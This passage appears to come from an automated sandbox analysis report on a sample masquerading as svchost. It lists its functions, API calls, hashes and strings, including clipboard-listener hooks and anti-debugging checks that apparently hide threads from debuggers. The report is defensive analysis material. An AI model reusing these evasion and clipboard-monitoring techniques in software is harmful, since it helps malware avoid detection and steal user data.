                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: d
                                      • API String ID: 2102423945-2564639436
                                      • Opcode ID: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction ID: 98ac9bbf1862fee8dd38477f1cb269d12124be3a97ef54141adb3ea9d1f28a8a
                                      • Opcode Fuzzy Hash: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction Fuzzy Hash: AE711C71A00208AFCB14CF98D980BEEB7B1EF45314F20C5AAE859A7381D735AE55CF45
                                      Function 004048E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 004048FF
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                        • Part of subcall function 004049F0: std::_Xinvalid_argument.LIBCPMT ref: 00404A40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: +H@$invalid string position
                                      • API String ID: 963545896-1930875418
                                      • Opcode ID: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction ID: 63a32dae344941abd75bf44d8694bd3729833ffbde521e45b6cf845468b15615
                                      • Opcode Fuzzy Hash: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction Fuzzy Hash: BB41BEB4E04208EFCB08DF99D59099EB7B2FF89304F208169E9556B395C734AE41DF58
                                      Function 004060E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: _b@$_b@
                                      • API String ID: 2102423945-1016703337
                                      • Opcode ID: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction ID: d2c120628e0025ae6c47003c0dfc20d879d162270b197ae00e22ec2d328a1bd1
                                      • Opcode Fuzzy Hash: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction Fuzzy Hash: D241FB70D0424ADFCF04CF94C9507BEBBB1BF41309F2581AAD4127B286C379AA65DB95
                                      Function 00409E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: p@$p@
                                      • API String ID: 0-369813981
                                      • Opcode ID: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction ID: 66bd6867b88826b1b95dfa9d2ffa6d0f737279d13ab6826bb27aa332bf879093
                                      • Opcode Fuzzy Hash: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction Fuzzy Hash: 5F312F70E0410AABDF04CF95C980ABFB7B5FF98304F10846AE515EB292E734AE51DB95
                                      Function 00404AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404B09
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • _memmove.LIBCMT ref: 00404B88
                                      Strings
                                      • invalid string position, xrefs: 00404B04
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1785806476-1799206989
                                      • Opcode ID: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction ID: c0dfb9ad1d84408aca3c0bc4771f70511c2b5052637a80a5b2d9d5061a7f9e99
                                      • Opcode Fuzzy Hash: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction Fuzzy Hash: D23199B4D0021ADFCB08DF98C5809AEBBB1FF89304F108959E9256B385C734EA41CF95
                                      Function 004062F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: 5$EOS
                                      • API String ID: 909875538-1935795245
                                      • Opcode ID: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction ID: cbb266d7676478089d8eb310e371b3e9da3167fd0b533db38114e6f4d1a4e4ac
                                      • Opcode Fuzzy Hash: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction Fuzzy Hash: F001C471940308BBDB00DB75DC42BEA7364AB09704F408039F8027B1C2E678D61596A9
                                      Function 00415FF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147B0
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147C0
                                      • __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00416014
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: csm
                                      • API String ID: 803148776-1018135373
                                      • Opcode ID: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction ID: de1ba10ac35249198c25df3b2f6096fc92783805510d7df63b2757107bfbf943
                                      • Opcode Fuzzy Hash: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction Fuzzy Hash: 9C014B34800305DACF34EF25C4446EEBBB6AF18311F25442FE445A6292DB3EC9C4CB59

                                      Executed Functions

                                      Function 00405B10 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 183COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AddClipboardFormatListener$ChangeClipboardChain$RemoveClipboardFormatListener$SetClipboardViewer$cC0inHj$user32.dll
                                      • API String ID: 0-2614838119
                                      • Opcode ID: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction ID: e4e5dd0de9f09d90ee084e7cb90bd22076d3a6f0aa843fabeb84720459f47b48
                                      • Opcode Fuzzy Hash: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction Fuzzy Hash: BF717D74A442589BEB209F20DC4DBEA7BB4EB14305F4484BBE44A762E1C77C8AC5DF19
                                      Function 0040DEB0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 158COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • IsDebuggerPresent.KERNEL32(EED2DB5A), ref: 0040DEEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DebuggerPresent
                                      • String ID: --check$--config$--run
                                      • API String ID: 1347740429-1715824448
                                      • Opcode ID: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction ID: a6e4f3225be8be52f133a3bd3a6e0bcae41296a009743188dca9600d065854ff
                                      • Opcode Fuzzy Hash: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction Fuzzy Hash: D4518871D04218DBDB24CFA6D844BEEBBB4BB08314F14862AE811B73C0D37D9905CBA9
                                      Function 00401100 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 101 401100-401128 call 401000 GetModuleHandleA 104 40112a-401149 call 401000 GetProcAddress 101->104 105 40116d 101->105 104->105 109 40114b-401161 GetCurrentProcess NtQueryInformationProcess 104->109 106 40116f-401172 105->106 109->105 110 401163-401167 109->110 110->105 111 401169-40116b 110->111 111->106
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040111B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040113C
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00401155
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040115C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction ID: a6687a9151404b893926094712e7bd645b6c75322a1efd05145472f72e85e0e4
                                      • Opcode Fuzzy Hash: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction Fuzzy Hash: 6101ADB0E40208BBDF10AFF0AC0DBDE7B789B08709F104176E611B62E1D2795A44DB2A
                                      Function 00401090 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37threadlibrarynativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 112 401090-4010b1 call 401000 GetModuleHandleA 115 4010b3-4010d2 call 401000 GetProcAddress 112->115 116 4010f8-4010fb 112->116 115->116 119 4010d4-4010d8 115->119 120 4010e2-4010e8 GetCurrentThread 119->120 121 4010da-4010e0 119->121 122 4010eb-4010f5 NtSetInformationThread 120->122 121->122 122->116
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                      • GetCurrentThread.KERNEL32 ref: 004010E2
                                      • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Thread$AddressCurrentHandleInformationModuleProc
                                      • String ID: 7=-55V-55$v={.=q7/8;6*=287|1;.*-
                                      • API String ID: 119525482-1927140540
                                      • Opcode ID: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction ID: 0b82ffc8d0ca1f8d0bdf6dd75ae4657ab6c6ae2d9d09e3d18241b6bc1c87c415
                                      • Opcode Fuzzy Hash: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction Fuzzy Hash: 69016DB4D40308BBDB10AFA0DC4A7DE7B74AB08706F10C07AA945626D1D6785A84DB5A
                                      Function 0040DE20 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00401090: GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                        • Part of subcall function 00401090: GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                        • Part of subcall function 00401090: NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                      • _wcsrchr.LIBCMT ref: 0040DE5E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                      • SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Module$AddressCurrentDirectoryErrorFileHandleInformationModeNameProcThread_wcsrchr
                                      • String ID:
                                      • API String ID: 1734398998-0
                                      • Opcode ID: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction ID: d51f74107fde24b1b44d4026587f8350a487b3b151098653a9adb7166d01a02a
                                      • Opcode Fuzzy Hash: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction Fuzzy Hash: FC016770D002089BE750DFB1DD06BED7774AF08705F00407DA745B61D1EE759A55CB69
                                      Function 0040DF97 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 135 40df97-40dfb0 call 40de20 138 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 135->138 139 40dfe2 138->139 140 40dfdc-40dfe0 138->140 142 40dfe2 call 40d7f0 139->142 140->139 141 40dfec-40dff0 140->141 144 40dff6-40e00c call 40f476 141->144 145 40e0ab-40e0af 141->145 143 40dfe7 142->143 143->145 151 40e04e-40e064 call 40f476 144->151 152 40e00e-40e019 144->152 147 40e0b1-40e0b5 LocalFree 145->147 148 40e0bb-40e119 145->148 147->148 159 40e0a6 151->159 160 40e066-40e071 151->160 154 40e01b-40e031 call 40f476 152->154 155 40e03c-40e044 call 405b10 152->155 154->155 166 40e033-40e039 154->166 162 40e049-40e04c 155->162 165 40e0a6 call 40d7f0 159->165 163 40e073-40e089 call 40f476 160->163 164 40e094-40e0a4 call 405e10 160->164 162->145 163->164 171 40e08b-40e091 163->171 164->145 165->145 166->155 171->164
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction ID: 8b7a6b8f356ce4702e62b5b31cb6d48a6c6ddf238daab223e574e510f6bfc381
                                      • Opcode Fuzzy Hash: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction Fuzzy Hash: 52010471D04219CBDB24DFE5D9087EEBBB4FB08315F20862AD402B22D0C77D591ADB6A
                                      Function 0040DFA6 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 172 40dfa6-40dfb0 call 40de20 175 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 172->175 176 40dfe2 175->176 177 40dfdc-40dfe0 175->177 179 40dfe2 call 40d7f0 176->179 177->176 178 40dfec-40dff0 177->178 181 40dff6-40e00c call 40f476 178->181 182 40e0ab-40e0af 178->182 180 40dfe7 179->180 180->182 188 40e04e-40e064 call 40f476 181->188 189 40e00e-40e019 181->189 184 40e0b1-40e0b5 LocalFree 182->184 185 40e0bb-40e119 182->185 184->185 196 40e0a6 188->196 197 40e066-40e071 188->197 191 40e01b-40e031 call 40f476 189->191 192 40e03c-40e044 call 405b10 189->192 191->192 203 40e033-40e039 191->203 199 40e049-40e04c 192->199 202 40e0a6 call 40d7f0 196->202 200 40e073-40e089 call 40f476 197->200 201 40e094-40e0a4 call 405e10 197->201 199->182 200->201 208 40e08b-40e091 200->208 201->182 202->182 203->192 208->201
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction ID: ae0a6c04ace250e6ec1f5edccdaa0bc9745cba344c46f71d870c8753c6498d62
                                      • Opcode Fuzzy Hash: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction Fuzzy Hash: 2E014471C04218CBDB24DFE5D8087EEBBB4FB08315F10422AD802B3280C77D5919CBAA
                                      Function 00411447 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 209 411447-411458 call 41141c ExitProcess
                                      APIs
                                      • ___crtCorExitProcess.LIBCMT ref: 0041144F
                                        • Part of subcall function 0041141C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00411454,00000000,?,00410BC2,000000FF,0000001E,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000), ref: 00411426
                                        • Part of subcall function 0041141C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411436
                                      • ExitProcess.KERNEL32 ref: 00411458
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                      • String ID:
                                      • API String ID: 2427264223-0
                                      • Opcode ID: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
